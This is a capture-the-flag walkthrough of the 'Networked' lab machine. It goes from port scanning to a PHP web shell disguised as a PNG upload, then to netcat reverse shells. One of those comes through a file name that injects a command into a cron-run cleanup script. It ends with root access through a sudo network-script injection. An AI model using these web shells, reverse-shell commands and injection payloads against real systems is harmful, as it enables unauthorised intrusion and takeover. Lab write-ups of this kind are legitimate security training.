Networked

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.146 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Thu Sep 15 02:21:14 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.146
Nmap scan report for 10.10.10.146
Host is up (0.059s latency).
Not shown: 65500 filtered tcp ports (no-response), 32 filtered tcp ports (host-prohibited)
PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  open   http
443/tcp closed https

# Nmap done at Thu Sep 15 02:21:40 2022 -- 1 IP address (1 host up) scanned in 26.57 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80,443 10.10.10.146 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Thu Sep 15 02:20:57 2022 as: nmap -sCV -p22,80,443 -oN targeted 10.10.10.146
Nmap scan report for 10.10.10.146
Host is up (0.038s latency).

PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
443/tcp closed https

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 15 02:21:07 2022 -- 1 IP address (1 host up) scanned in 9.52 seconds

The website just shows a simple message.

I found a few files and subdirectories with gobuster.

gobuster dir -u http://10.10.10.146 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt,php

dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
-x file extensions to search for.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.146/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2022/09/15 16:40:13 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 236] [--> http://10.10.10.146/uploads/]
/upload.php           (Status: 200) [Size: 169]                                   
/lib.php              (Status: 200) [Size: 0]                                     
/backup               (Status: 301) [Size: 235] [--> http://10.10.10.146/backup/] 
/photos.php           (Status: 200) [Size: 1302]                                  
                                                                                  
===============================================================
2022/09/15 16:41:55 Finished
===============================================================

The /backup directory shows a file called backup.tar. Let's download it.

After downloading the file, decompress it.

tar -xf backup.tar

-x extract files from an archive.
-f specific file.

Now we have four PHP files that seems to be on the website.

ls | grep php

index.php
lib.php
photos.php
upload.php

We could upload files in the /upload.php page.

The /photos.php page shows the uploaded files.

Exploitation

As a test, I'm going to upload an image called penguin.png.

The file gets uploaded successfully.

And we can see the image in the /photos.php page.

If I try to upload the same image, but with the name penguin.php.png, it also works.

And we can see it in the gallery.

Something we could do to be able to run commands on the server, create a file called webshell.php.png with some PHP code.

nano webshell.php.png

AAAAAAAAAAAAAAAAAAAAAAAAAA
<?php echo "<pre>" . system($_GET['cmd']) . "</pre>";?>

Now, modify the file with hexeditor, and add the magic numbers of PNG files which are 89 50 4E 47 0D 0A 1A 0A.

hexeditor webshell.php.png

00000000  89 50 4E 47  0D 0A 1A 0A   41 41 41 41  41 41 41 41                                                     .PNG....AAAAAAAA
00000010  41 41 41 41  41 41 41 41   41 41 0A 3C  3F 70 68 70                                                     AAAAAAAAAA.<?php
00000020  20 65 63 68  6F 20 22 3C   70 72 65 3E  22 20 2E 20                                                      echo "<pre>" . 
00000030  73 79 73 74  65 6D 28 24   5F 47 45 54  5B 27 63 6D                                                     system($_GET['cm
00000040  64 27 5D 29  20 2E 20 22   3C 2F 70 72  65 3E 22 3B                                                     d']) . "</pre>";
00000050  3F 3E 0A                                                                                                ?>.

Now, upload it to the website.

It has uploaded successfully, and we can access it.

Finally, we can execute commands on the system.

http://10.10.10.146/uploads/10_10_14_11.php.png?cmd=whoami

Time to get a shell. Let's set a netcat listener on port 4444.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

Now, if we access the following URL, we should get a shell as apache.

http://10.10.10.146/uploads/10_10_14_11.php.png?cmd=nc -e /bin/bash 10.10.14.11 4444

listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.146] 59798
whoami
apache

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg
reset
Terminal type? xterm

Next, I export a few variables:

export TERM=xterm
export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

As we can see, we have to become the guly user because only he can read the user flag.

ls -la /home/guly

total 28
drwxr-xr-x. 2 guly guly 159 Jul  9  2019 .
drwxr-xr-x. 3 root root  18 Jul  2  2019 ..
lrwxrwxrwx. 1 root root   9 Jul  2  2019 .bash_history -> /dev/null
-rw-r--r--. 1 guly guly  18 Oct 30  2018 .bash_logout
-rw-r--r--. 1 guly guly 193 Oct 30  2018 .bash_profile
-rw-r--r--. 1 guly guly 231 Oct 30  2018 .bashrc
-rw-------  1 guly guly 639 Jul  9  2019 .viminfo
-r--r--r--. 1 root root 782 Oct 30  2018 check_attack.php
-rw-r--r--  1 root root  44 Oct 30  2018 crontab.guly
-r--------. 1 guly guly  33 Oct 30  2018 user.txt

In his home directory there is also a crontab file which executes the check_attack.php file every three minutes.

cat /home/guly/crontab.guly

*/3 * * * * php /home/guly/check_attack.php

The check_attack.php file removes all the files in the /var/www/html/uploads/ directory, one by one, which name doesn't contain an IP address.

cat /home/guly/check_attack.php

<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>

We could exploit this script by doing command injection. We could create a file called ; nc -c 10.10.14.11 4444;, so when the script tries to delete it, it will send us a reverse shell.

cd /var/www/html/uploads
touch "; nc -c bash 10.10.14.11 4444"

Now, if we set a netcat listener on port 4444, and wait for a bit, we should get a shell as, and then we'll be able to grab the user flag.

nc -lvnp 4444

listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.146] 59804
whoami
guly
cat /home/guly/user.txt
526cfc2305f17faaacecf212c57d71c5

Let's set a proper TTY again, the same way we did before. If we check the sudo privileges, we'll see that we can execute a script as root.

sudo -l

Matching Defaults entries for guly on networked:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh

The script is writing some data into a file called /etc/sysconfig/network-scripts/ifcfg-guly.

cat /usr/local/sbin/changename.sh

#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"
                                                                                                                                  
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do                                                                           
        echo "interface $var:"                                                                                                    
        read x                                                                                                                    
        while [[ ! $x =~ $regexp ]]; do                                                                                           
                echo "wrong input, try again"                                                                                     
                echo "interface $var:"                                                                                            
                read x                                                                                                            
        done                                                                                                                      
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly                                                                 
done                                                                                                                              
                                                                                                                                  
/sbin/ifup guly0

As this article explains, there is a way to execute commands as root. We'll have to run the /usr/local/sbin/changename.sh script with sudo privileges, and give test bash as the value of the interface NAME. Then fill all the other interfaces with random data. Once we get the shell, all we have to do is reap the harvest and take the root flag.

sudo /usr/local/sbin/changename.sh

interface NAME:
test bash
interface PROXY_METHOD:
test
interface BROWSER_ONLY:
test
interface BOOTPROTO:
test
[root@networked network-scripts]# whoami
root
[root@networked network-scripts]# cat /root/root.txt 
0a8ecda83f1d81251099e8ac3d0dcb82

Last updated 2 years ago

Was this helpful?